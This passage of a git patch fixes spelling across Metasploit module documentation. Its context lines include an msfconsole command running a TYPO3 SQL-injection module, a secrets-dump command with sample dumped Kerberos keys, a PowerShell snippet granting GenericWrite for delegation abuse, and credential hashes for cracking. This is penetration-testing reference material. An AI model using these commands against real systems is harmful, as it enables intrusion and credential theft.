From 557a15a115cc92799cf3e158b05c7791ab2e3294 Mon Sep 17 00:00:00 2001 From: h00die Date: Tue, 10 Oct 2023 14:46:18 -0400 Subject: [PATCH 1/2] spelling fixes on docs --- .../auxiliary/admin/aws/aws_launch_instances.md | 6 +++--- .../modules/auxiliary/admin/dcerpc/icpr_cert.md | 2 +- .../auxiliary/admin/http/cisco_7937g_ssh_privesc.md | 12 ++++++------ .../auxiliary/admin/http/typo3_news_module_sqli.md | 4 ++-- .../modules/auxiliary/admin/kerberos/get_ticket.md | 2 +- .../modules/auxiliary/admin/kerberos/keytab.md | 8 ++++---- .../auxiliary/admin/ldap/ad_cs_cert_template.md | 4 ++-- documentation/modules/auxiliary/admin/ldap/rbcd.md | 2 +- .../modules/auxiliary/analyze/crack_databases.md | 4 ++-- .../auxiliary/client/telegram/send_message.md | 2 +- .../modules/auxiliary/cloud/aws/enum_iam.md | 2 +- .../auxiliary/dos/http/cable_haunt_websocket_dos.md | 2 +- documentation/modules/auxiliary/fileformat/badpdf.md | 2 +- .../modules/auxiliary/gather/cisco_rv320_config.md | 2 +- .../modules/auxiliary/gather/cloud_lookup.md | 2 +- .../modules/auxiliary/gather/elasticsearch_enum.md | 4 ++-- .../gather/exchange_proxylogon_collector.md | 4 ++-- .../modules/auxiliary/gather/get_user_spns.md | 2 +- .../hikvision_info_disclosure_cve_2017_7921.md | 4 ++-- documentation/modules/auxiliary/gather/ldap_query.md | 2 +- .../modules/auxiliary/gather/office365userenum.md | 2 +- .../modules/auxiliary/gather/peplink_bauth_sqli.md | 4 ++-- .../auxiliary/gather/piwigo_cve_2023_26876.md | 4 ++-- .../gather/vbulletin_getindexablecontent_sqli.md | 4 ++-- .../modules/auxiliary/gather/zoomeye_search.md | 2 +- .../modules/auxiliary/scanner/db2/discovery.md | 2 +- .../auxiliary/scanner/gopher/gopher_gophermap.md | 2 +- .../scanner/http/cassandra_web_file_read.md | 2 +- .../scanner/http/cisco_asa_clientless_vpn.md | 2 +- .../auxiliary/scanner/http/cisco_device_manager.md | 2 +- .../modules/auxiliary/scanner/http/dir_scanner.md | 2 +- .../scanner/http/es_file_explorer_open_port.md | 4 ++-- .../scanner/http/frontpage_credential_dump.md | 2 +- .../modules/auxiliary/scanner/http/http_put.md | 2 +- .../modules/auxiliary/scanner/http/jira_user_enum.md | 2 +- .../http/manageengine_deviceexpert_user_creds.md | 2 +- .../auxiliary/scanner/http/tomcat_mgr_login.md | 2 +- .../auxiliary/scanner/http/wordpress_login_enum.md | 2 +- .../auxiliary/scanner/http/wp_easy_wp_smtp.md | 4 ++-- .../auxiliary/scanner/misc/sunrpc_portmapper.md | 2 +- .../modules/auxiliary/scanner/mqtt/connect.md | 2 +- .../scanner/sap/sap_mgmt_con_listconfigfiles.md | 2 +- .../auxiliary/scanner/scada/profinet_siemens.md | 2 +- .../auxiliary/scanner/snmp/cisco_config_tftp.md | 2 +- .../auxiliary/scanner/ssh/juniper_backdoor.md | 2 +- .../auxiliary/scanner/ssl/openssl_heartbleed.md | 4 ++-- .../modules/auxiliary/scanner/ssl/ssl_version.md | 2 +- .../modules/auxiliary/scanner/x11/open_x11.md | 2 +- .../modules/auxiliary/server/local_hwbridge.md | 4 ++-- .../sqli/dlink/dlink_central_wifimanager_sqli.md | 4 ++-- .../windows/applocker_evasion_regasm_regsvcs.md | 2 +- .../modules/evasion/windows/process_herpaderping.md | 4 ++-- .../modules/evasion/windows/syscall_inject.md | 2 +- .../modules/exploit/aix/local/xorg_x11_server.md | 2 +- .../modules/exploit/android/local/put_user_vroot.md | 4 ++-- .../exploit/freebsd/webapp/spamtitan_unauth_rce.md | 8 ++++---- .../modules/exploit/linux/http/alienvault_exec.md | 2 +- .../modules/exploit/linux/http/cisco_rv32x_rce.md | 2 +- .../exploit/linux/http/cpi_tararchive_upload.md | 2 +- .../modules/exploit/linux/http/denyall_waf_exec.md | 2 +- .../linux/http/dlink_dwl_2600_command_injection.md | 2 +- .../fortinet_authentication_bypass_cve_2022_40684.md | 6 +++--- .../exploit/linux/http/froxlor_log_path_rce.md | 2 +- .../modules/exploit/linux/http/goahead_ldpreload.md | 2 +- .../linux/http/grandstream_ucm62xx_sendemail_rce.md | 2 +- .../exploit/linux/http/huawei_hg532n_cmdinject.md | 8 ++++---- .../exploit/linux/http/kaltura_unserialize_rce.md | 2 +- .../exploit/linux/http/lexmark_faxtrace_settings.md | 2 +- .../linux/http/microfocus_obr_cmd_injection.md | 2 +- .../exploit/linux/http/mobileiron_core_log4shell.md | 2 +- ...gios_xi_plugins_check_plugin_authenticated_rce.md | 2 +- .../linux/http/netgear_dgn1000_setup_unauth_exec.md | 4 ++-- .../linux/http/rconfig_ajaxarchivefiles_rce.md | 2 +- .../linux/http/samsung_srv_1670d_upload_exec.md | 2 +- .../linux/http/synology_dsm_smart_exec_auth.md | 2 +- .../linux/http/totolink_unauth_rce_cve_2023_30013.md | 2 +- .../linux/http/trendmicro_imsva_widget_exec.md | 2 +- .../http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md | 2 +- .../http/wd_mycloud_unauthenticated_cmd_injection.md | 4 ++-- .../modules/exploit/linux/http/xplico_exec.md | 8 ++++---- .../linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md | 4 ++-- .../exploit/linux/local/cve_2022_0995_watch_queue.md | 2 +- .../exploit/linux/local/docker_runc_escape.md | 2 +- .../exploit/linux/local/juju_run_agent_priv_esc.md | 2 +- .../exploit/linux/local/service_persistence.md | 2 +- .../exploit/linux/local/sudoedit_bypass_priv_esc.md | 2 +- .../misc/zyxel_multiple_devices_zhttp_lan_rce.md | 4 ++-- .../linux/redis/redis_replication_cmd_exec.md | 2 +- .../modules/exploit/linux/samba/is_known_pipename.md | 2 +- .../exploit/linux/samba/lsa_transnames_heap.md | 2 +- .../modules/exploit/mainframe/ftp/ftp_jcl_creds.md | 2 +- .../multi/http/apache_flink_jar_upload_exec.md | 4 ++-- .../exploit/multi/http/apache_nifi_processor_rce.md | 2 +- .../modules/exploit/multi/http/cockpit_cms_rce.md | 2 +- .../exploit/multi/http/horde_form_file_upload.md | 2 +- .../exploit/multi/http/magento_unserialize.md | 2 +- .../exploit/multi/http/makoserver_cmd_exec.md | 2 +- .../multi/http/microfocus_ucmdb_unauth_deser.md | 2 +- .../exploit/multi/http/moodle_spelling_path_rce.md | 2 +- .../moodle_teacher_enrollment_priv_esc_to_rce.md | 4 ++-- .../multi/http/opmanager_sumpdu_deserialization.md | 2 +- .../exploit/multi/http/phpmailer_arg_injection.md | 2 +- .../exploit/multi/http/qdpm_authenticated_rce.md | 2 +- .../http/sonicwall_shell_injection_cve_2023_34124.md | 2 +- .../exploit/multi/http/struts2_multi_eval_ognl.md | 2 +- .../modules/exploit/multi/http/tomcat_mgr_deploy.md | 2 +- .../modules/exploit/multi/http/tomcat_mgr_upload.md | 2 +- .../multi/http/vbulletin_getindexablecontent.md | 6 +++--- .../modules/exploit/multi/http/zabbix_script_exec.md | 6 +++--- .../modules/exploit/multi/mysql/mysql_udf_payload.md | 2 +- .../modules/exploit/multi/php/jorani_path_trav.md | 2 +- .../modules/exploit/multi/script/web_delivery.md | 2 +- .../exploit/osx/local/timemachine_cmd_injection.md | 2 +- .../exploit/unix/http/pfsense_config_data_exec.md | 2 +- .../unix/http/pfsense_graph_injection_exec.md | 4 ++-- .../modules/exploit/unix/http/zivif_ipcheck_exec.md | 2 +- .../exploit/unix/misc/polycom_hdx_traceroute_exec.md | 4 ++-- .../exploit/unix/webapp/bolt_authenticated_rce.md | 2 +- .../unix/webapp/opennetadmin_ping_cmd_injection.md | 2 +- .../exploit/unix/webapp/xymon_useradm_cmd_exec.md | 2 +- .../exploit/unix/webapp/zoneminder_lang_exec.md | 2 +- .../modules/exploit/windows/backupexec/ssl_uaf.md | 2 +- .../windows/browser/ms14_064_ole_code_execution.md | 2 +- .../exploit/windows/fileformat/foxit_reader_uaf.md | 2 +- .../exploit/windows/fileformat/office_ms17_11882.md | 2 +- .../modules/exploit/windows/fileformat/vlc_mkv.md | 2 +- .../exploit/windows/fileformat/word_mshtml_rce.md | 4 ++-- .../modules/exploit/windows/ftp/ftpshell_cli_bof.md | 2 +- .../windows/http/apache_activemq_traversal_upload.md | 2 +- .../windows/http/dnn_cookie_deserialization_rce.md | 6 +++--- .../exploit/windows/http/exchange_proxyshell_rce.md | 2 +- .../exploit/windows/http/lg_simple_editor_rce.md | 2 +- ...manageengine_adselfservice_plus_cve_2022_28810.md | 2 +- .../windows/http/manageengine_appmanager_exec.md | 2 +- .../exploit/windows/http/oats_weblogic_console.md | 2 +- .../windows/http/sitecore_xp_cve_2021_42237.md | 2 +- .../http/trendmicro_officescan_widget_exec.md | 2 +- .../windows/local/cve_2020_0668_service_tracing.md | 2 +- .../windows/local/cve_2020_1048_printerdemon.md | 2 +- .../windows/local/cve_2020_1337_printerdemon.md | 2 +- .../windows/local/cve_2022_26904_superprofile.md | 2 +- .../exploit/windows/local/lexmark_driver_privesc.md | 2 +- .../exploit/windows/local/ms16_075_reflection.md | 2 +- .../modules/exploit/windows/local/ms16_reflection.md | 2 +- .../modules/exploit/windows/local/tokenmagic.md | 2 +- .../local/windscribe_windscribeservice_priv_esc.md | 2 +- .../exploit/windows/misc/ahsay_backup_fileupload.md | 4 ++-- .../exploit/windows/misc/ais_esel_server_rce.md | 10 +++++----- .../modules/exploit/windows/misc/cloudme_sync.md | 2 +- .../misc/hp_imc_dbman_restartdb_unauth_rce.md | 2 +- .../misc/hp_imc_dbman_restoredbase_unauth_rce.md | 2 +- .../windows/misc/hp_loadrunner_magentproc_cmdexec.md | 2 +- .../exploit/windows/tftp/distinct_tftp_traversal.md | 2 +- .../payload/windows/meterpreter/reverse_https.md | 2 +- .../payload/windows/meterpreter/reverse_tcp.md | 6 +++--- .../modules/post/android/gather/sub_info.md | 2 +- .../modules/post/hardware/automotive/canprobe.md | 4 ++-- .../modules/post/hardware/automotive/getvinfo.md | 2 +- documentation/modules/post/linux/gather/hashdump.md | 2 +- .../modules/post/linux/manage/disable_clamav.md | 2 +- .../post/multi/escalate/aws_create_iam_user.md | 6 +++--- .../modules/post/multi/gather/enum_hexchat.md | 2 +- .../post/multi/gather/unix_cached_ad_hashes.md | 4 ++-- documentation/modules/post/multi/manage/open.md | 2 +- .../modules/post/multi/manage/play_youtube.md | 4 ++-- documentation/modules/post/osx/gather/gitignore.md | 2 +- .../modules/post/windows/capture/keylog_recorder.md | 8 ++++---- .../post/windows/escalate/unmarshal_cmd_exec.md | 2 +- .../modules/post/windows/gather/bitlocker_fvek.md | 2 +- .../modules/post/windows/gather/bloodhound.md | 2 +- .../modules/post/windows/gather/credentials/aim.md | 4 ++-- .../post/windows/gather/credentials/chrome.md | 4 ++-- .../post/windows/gather/credentials/comodo.md | 4 ++-- .../post/windows/gather/credentials/coolnovo.md | 4 ++-- .../post/windows/gather/credentials/digsby.md | 4 ++-- .../modules/post/windows/gather/credentials/flock.md | 4 ++-- .../post/windows/gather/credentials/gadugadu.md | 4 ++-- .../modules/post/windows/gather/credentials/icq.md | 4 ++-- .../modules/post/windows/gather/credentials/ie.md | 4 ++-- .../post/windows/gather/credentials/incredimail.md | 4 ++-- .../post/windows/gather/credentials/kakaotalk.md | 4 ++-- .../post/windows/gather/credentials/kmeleon.md | 4 ++-- .../modules/post/windows/gather/credentials/line.md | 4 ++-- .../post/windows/gather/credentials/maxthon.md | 4 ++-- .../post/windows/gather/credentials/miranda.md | 4 ++-- .../modules/post/windows/gather/credentials/opera.md | 4 ++-- .../post/windows/gather/credentials/operamail.md | 4 ++-- .../post/windows/gather/credentials/postbox.md | 4 ++-- .../modules/post/windows/gather/credentials/qq.md | 4 ++-- .../post/windows/gather/credentials/safari.md | 4 ++-- .../post/windows/gather/credentials/seamonkey.md | 4 ++-- .../post/windows/gather/credentials/srware.md | 4 ++-- .../modules/post/windows/gather/credentials/tango.md | 4 ++-- .../post/windows/gather/credentials/thunderbird.md | 4 ++-- .../modules/post/windows/gather/credentials/tlen.md | 4 ++-- .../modules/post/windows/gather/credentials/viber.md | 4 ++-- .../windows/gather/credentials/windowslivemail.md | 4 ++-- .../modules/post/windows/gather/credentials/xchat.md | 4 ++-- .../post/windows/gather/forensics/fanny_bmp_check.md | 2 +- .../modules/post/windows/gather/lsa_secrets.md | 2 +- .../modules/post/windows/gather/make_csv_orgchart.md | 2 +- .../modules/post/windows/gather/ntds_grabber.md | 4 ++-- .../post/windows/manage/dell_memory_protect.md | 6 +++--- .../post/windows/manage/execute_dotnet_assembly.md | 6 +++--- .../modules/post/windows/manage/hashcarve.md | 2 +- .../modules/post/windows/manage/peinjector.md | 6 +++--- .../modules/post/windows/manage/priv_migrate.md | 2 +- 207 files changed, 309 insertions(+), 309 deletions(-) diff --git a/documentation/modules/auxiliary/admin/aws/aws_launch_instances.md b/documentation/modules/auxiliary/admin/aws/aws_launch_instances.md index 6e906b44ef6c..3a7a1f1bfc32 100644 --- a/documentation/modules/auxiliary/admin/aws/aws_launch_instances.md +++ b/documentation/modules/auxiliary/admin/aws/aws_launch_instances.md @@ -21,7 +21,7 @@ Shell #1: [*] instance i-12345678 status: initializing ... [*] instance i-12345678 status: ok -[*] Instance i-12345678 has IP adrress 35.12.4.1 +[*] Instance i-12345678 has IP address 35.12.4.1 [*] Auxiliary module execution completed ``` @@ -56,7 +56,7 @@ can be made available by assigning an Internet routable IP address to a host or routing traffic to it through an ELB (Elastic Load Balancer). In either case security-groups are used to open access to network ranges and specific TPC/UDP ports. Security-groups provide much of the functionality of traditional firewalls -and can be configured by specifyig a protocol, a CIDR and a port. +and can be configured by specifying a protocol, a CIDR and a port. ## How it Works @@ -126,7 +126,7 @@ Advanced Options: * `INSTANCE_TYPE`: The instance type * `MaxCount`: Maximum number of instances to launch -* `MinCount`: Minumum number of instances to launch +* `MinCount`: Minimum number of instances to launch * `ROLE_NAME`: The instance profile/role name * `RPORT:` AWS EC2 Endpoint TCP Port * `SEC_GROUP_ID`: the EC2 security group to use diff --git a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md index 07b89adf068e..6aa09e8889b2 100644 --- a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md +++ b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md @@ -127,7 +127,7 @@ has the [KB5014754][KB5014754] patch applied and the REG_DWORD account with the specified UPN should be supplied as well. In November of 2023, Microsoft will change the default value of `StrongCertificateBindingEnforcement` to 2. If the server has the patch applied, the SID will be returned in the issued certificate which ensures that the required strong mapping is in place. If the strong mapping is required and the -SID is not specified in the certificate, then Kerberos authentication wil fail with `KDC_ERR_CERTIFICATE_MISMATCH`. +SID is not specified in the certificate, then Kerberos authentication will fail with `KDC_ERR_CERTIFICATE_MISMATCH`. The user must know: diff --git a/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md b/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md index 6c3b6941f9d5..6d5577fae5b3 100644 --- a/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md +++ b/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md @@ -128,7 +128,7 @@ ncasCb - Show detailed ncas information, related to either call services, uptime - Show phone uptime. appPrt - Show UI's call status. fntPrt - Show information about fonts available on phone. -memtop - Shows the top poiter to current memory. +memtop - Shows the top pointer to current memory. removeScheduledLogEntry - debug addScheduledLogEntry - debug fatalError - Simulate fatal error for the phone. @@ -178,8 +178,8 @@ localePrintAll - localePrintAll ceShow - Show Client Engine Status Commands 101 to 121: -udiShow - Show Unique Device Indentifier -show - Show Unique Device Indentifier +udiShow - Show Unique Device Identifier +show - Show Unique Device Identifier pbnShow - Display app & bootrom headers upr - Upgrade to a Rockpile Standalone Image upm - Upgrade to a Rockpile Manf Image @@ -336,7 +336,7 @@ ncasCb - Show detailed ncas information, related to either call services, uptime - Show phone uptime. appPrt - Show UI's call status. fntPrt - Show information about fonts available on phone. -memtop - Shows the top poiter to current memory. +memtop - Shows the top pointer to current memory. removeScheduledLogEntry - debug addScheduledLogEntry - debug fatalError - Simulate fatal error for the phone. @@ -386,8 +386,8 @@ localePrintAll - localePrintAll ceShow - Show Client Engine Status Commands 101 to 121: -udiShow - Show Unique Device Indentifier -show - Show Unique Device Indentifier +udiShow - Show Unique Device Identifier +show - Show Unique Device Identifier pbnShow - Display app & bootrom headers upr - Upgrade to a Rockpile Standalone Image upm - Upgrade to a Rockpile Manf Image diff --git a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md index c53094844864..6330a66b89ac 100644 --- a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md +++ b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md @@ -4,7 +4,7 @@ News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vul ## Vulnerable Application -In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query. +In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the parameter name. This allows a user to inject values to an SQL query. To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash. @@ -28,7 +28,7 @@ The value for query parameter `id` of the page that the news extension is runnin - [ ] Enable the news extension - [ ] Import [vulnerable page](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip) - [ ] Enable page -- [ ] Verify if page is visble to unauthenticated user and note the id +- [ ] Verify if page is visible to unauthenticated user and note the id - [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost ; set id ; run'` - [ ] Username and password hash should have been retrieved diff --git a/documentation/modules/auxiliary/admin/kerberos/get_ticket.md b/documentation/modules/auxiliary/admin/kerberos/get_ticket.md index 6e7dc7d66a9d..20f1fdc1dd93 100644 --- a/documentation/modules/auxiliary/admin/kerberos/get_ticket.md +++ b/documentation/modules/auxiliary/admin/kerberos/get_ticket.md @@ -78,7 +78,7 @@ Default is `true`. This option is only used when requesting a TGS. -The Kerberos TGT to use when requesting the sevice ticket. If unset, the database will be checked' +The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked' ## Scenarios diff --git a/documentation/modules/auxiliary/admin/kerberos/keytab.md b/documentation/modules/auxiliary/admin/kerberos/keytab.md index 80f4ffa87696..362e75831a24 100644 --- a/documentation/modules/auxiliary/admin/kerberos/keytab.md +++ b/documentation/modules/auxiliary/admin/kerberos/keytab.md @@ -63,7 +63,7 @@ Export Kerberos encryption keys stored in the Metasploit database to a keytab fi # Secrets dump msf6 > use auxiliary/gather/windows_secrets_dump msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13 -... ommitted ... +... omitted ... # Kerberos keys: Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea @@ -72,7 +72,7 @@ Administrator:des-cbc-crc:ad49d9d92f5da170 krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da krbtgt:des-cbc-md5:3ddf2f627c4cbcdc -... ommitted ... +... omitted ... [*] Auxiliary module execution completed # Export to keytab @@ -94,7 +94,7 @@ Keytab entries 1 18 (AES256) krbtgt@adf3.local e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c 1970-01-01 01:00:00 +0100 1 17 (AES128) krbtgt@adf3.local ba87b2bc064673da39f40d37f9daa9da 1970-01-01 01:00:00 +0100 1 3 (DES_CBC_MD5) krbtgt@adf3.local 3ddf2f627c4cbcdc 1970-01-01 01:00:00 +0100 -... ommitted ... +... omitted ... [*] Auxiliary module execution completed ``` @@ -168,7 +168,7 @@ tgs-req ^^^^^^^^^^^^^^ authenticator value now decrypted using the previously generated keytab file ``` -If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itsel. If not - Wireshark +If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itself. If not - Wireshark will generate warnings about being unable to decrypt the TGT ticket which is signed using the krbtgt account. Additional details: https://wiki.wireshark.org/Kerberos diff --git a/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md b/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md index 0ad3fdcf64f4..2f148673fd86 100644 --- a/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md +++ b/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md @@ -56,11 +56,11 @@ The file format is determined by the extension so the file must end in either `. #### The JSON format The JSON file format is a hash with attribute name keys and ASCII-hex encoded values. These files are compatible with -[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies fo certificate to +[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies of certificate to disk. #### The YAML format -The YAML file format is similiar to the JSON file format, but takes advantage of YAML's ability to include comments. +The YAML file format is similar to the JSON file format, but takes advantage of YAML's ability to include comments. The file consists of a hash with attribute name keys and value strings. The `nTSecurityDescriptor` file can be either a binary string representing a literal value, or a security descriptor defined in Microsoft's [Security Descriptor Definition Language (SDDL)][sddl]. Premade configuration templates provided by Metasploit use this format. diff --git a/documentation/modules/auxiliary/admin/ldap/rbcd.md b/documentation/modules/auxiliary/admin/ldap/rbcd.md index ca9cce477c78..dc4d1f2d3fce 100644 --- a/documentation/modules/auxiliary/admin/ldap/rbcd.md +++ b/documentation/modules/auxiliary/admin/ldap/rbcd.md @@ -32,7 +32,7 @@ Grant Write privileges for sandy to the target machine, i.e. `WS01`: $TargetComputer = Get-ADComputer 'WS01' $User = Get-ADUser 'sandy' -# Add GenericWrite access to the user against the target coputer +# Add GenericWrite access to the user against the target computer $Rights = [System.DirectoryServices.ActiveDirectoryRights] "GenericWrite" $ControlType = [System.Security.AccessControl.AccessControlType] "Allow" $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All" diff --git a/documentation/modules/auxiliary/analyze/crack_databases.md b/documentation/modules/auxiliary/analyze/crack_databases.md index 2ebdbc9a5111..3262d10d6efb 100644 --- a/documentation/modules/auxiliary/analyze/crack_databases.md +++ b/documentation/modules/auxiliary/analyze/crack_databases.md @@ -169,7 +169,7 @@ creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D48 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E278$ creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1 -## oracle (10) uses usernames in the hashing, so we can't overide that here +## oracle (10) uses usernames in the hashing, so we can't override that here creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle ## oracle 11/12 H value, username is used @@ -177,7 +177,7 @@ creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:$ creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B3$ -##postgres uses username, so we can't overide that here +##postgres uses username, so we can't override that here creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860 creds add user:example postgres:md5be86a79bf20fake2d58d5453c47d4860 echo "" > /root/.msf4/john.pot diff --git a/documentation/modules/auxiliary/client/telegram/send_message.md b/documentation/modules/auxiliary/client/telegram/send_message.md index f2a55ae97131..eaff416d9b87 100644 --- a/documentation/modules/auxiliary/client/telegram/send_message.md +++ b/documentation/modules/auxiliary/client/telegram/send_message.md @@ -53,7 +53,7 @@ Module options (auxiliary/client/telegram/send_message): BOT_TOKEN yes Telegram BOT token CHAT_ID no Chat ID for the BOT DOCUMENT no The path to the document(binary, video etc) - FORMATTING Markdown no Message formating option (Markdown|MarkdownV2|HTML) (Accepted: Markdown, MarkdownV2, HT + FORMATTING Markdown no Message formatting option (Markdown|MarkdownV2|HTML) (Accepted: Markdown, MarkdownV2, HT ML) IDFILE no File containing chat IDs, one per line MESSAGE no The message to be sent diff --git a/documentation/modules/auxiliary/cloud/aws/enum_iam.md b/documentation/modules/auxiliary/cloud/aws/enum_iam.md index ac7a1d9b71a7..776adb7e2ac7 100644 --- a/documentation/modules/auxiliary/cloud/aws/enum_iam.md +++ b/documentation/modules/auxiliary/cloud/aws/enum_iam.md @@ -43,7 +43,7 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a **LIMIT** - Some AWS API calls support limiting output, such that the module will only reutrn the number of instances, without detailing the configuration of each instance. Optionally, this module's output can be filtered to minimize the query to AWS and the user output. Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed. + Some AWS API calls support limiting output, such that the module will only return the number of instances, without detailing the configuration of each instance. Optionally, this module's output can be filtered to minimize the query to AWS and the user output. Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed. Note that the `LIMIT` parameter is imposed per region, so the total number of results may be higher than the user-specified limit, but the maximum number of results for a single region will not exceed `LIMIT`. This behavior is due to the AWS API. diff --git a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md index 00bbaa4a23eb..3e166c0db54a 100644 --- a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md +++ b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md @@ -10,7 +10,7 @@ Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more info **WS_USERNAME** -This is the basic auth username for the spectrum analysis web service. This is typicall default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`. This will vary from manufacturer to manufacturer and ISP to ISP. +This is the basic auth username for the spectrum analysis web service. This is typically default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`. This will vary from manufacturer to manufacturer and ISP to ISP. **WS_PASSWORD** diff --git a/documentation/modules/auxiliary/fileformat/badpdf.md b/documentation/modules/auxiliary/fileformat/badpdf.md index 0baca14c2485..17f1d0bba74b 100644 --- a/documentation/modules/auxiliary/fileformat/badpdf.md +++ b/documentation/modules/auxiliary/fileformat/badpdf.md @@ -85,7 +85,7 @@ msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf pdfinject => /root/Desktop/example.pdf msf auxiliary(fileformat/badpdf) > exploit -[+] Malicious file writen to /root/Desktop/example_malicious.pdf +[+] Malicious file written to /root/Desktop/example_malicious.pdf [\*] Auxiliary module execution completed msf auxiliary(fileformat/badpdf) > diff --git a/documentation/modules/auxiliary/gather/cisco_rv320_config.md b/documentation/modules/auxiliary/gather/cisco_rv320_config.md index f641b0b4ddd3..d1383e70b9f1 100644 --- a/documentation/modules/auxiliary/gather/cisco_rv320_config.md +++ b/documentation/modules/auxiliary/gather/cisco_rv320_config.md @@ -2,7 +2,7 @@ [CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router. The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52). -An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information. On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side. On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally. +An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information. On version `1.4.2.15`, the vulnerability is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side. On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally. More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/). diff --git a/documentation/modules/auxiliary/gather/cloud_lookup.md b/documentation/modules/auxiliary/gather/cloud_lookup.md index 6e969f4cc7cd..73f11b240447 100644 --- a/documentation/modules/auxiliary/gather/cloud_lookup.md +++ b/documentation/modules/auxiliary/gather/cloud_lookup.md @@ -44,7 +44,7 @@ Files containing IP addresses to blacklist during the analysis process, one per ### THREADS -Number of concurent threads needed for DNS enumeration. Default: 8 +Number of concurrent threads needed for DNS enumeration. Default: 8 ### WORDLIST diff --git a/documentation/modules/auxiliary/gather/elasticsearch_enum.md b/documentation/modules/auxiliary/gather/elasticsearch_enum.md index a54fb74d9bc8..b424456034dd 100644 --- a/documentation/modules/auxiliary/gather/elasticsearch_enum.md +++ b/documentation/modules/auxiliary/gather/elasticsearch_enum.md @@ -2,7 +2,7 @@ This module enumerates Elasticsearch instances. It uses the REST API in order to gather information about the server, the 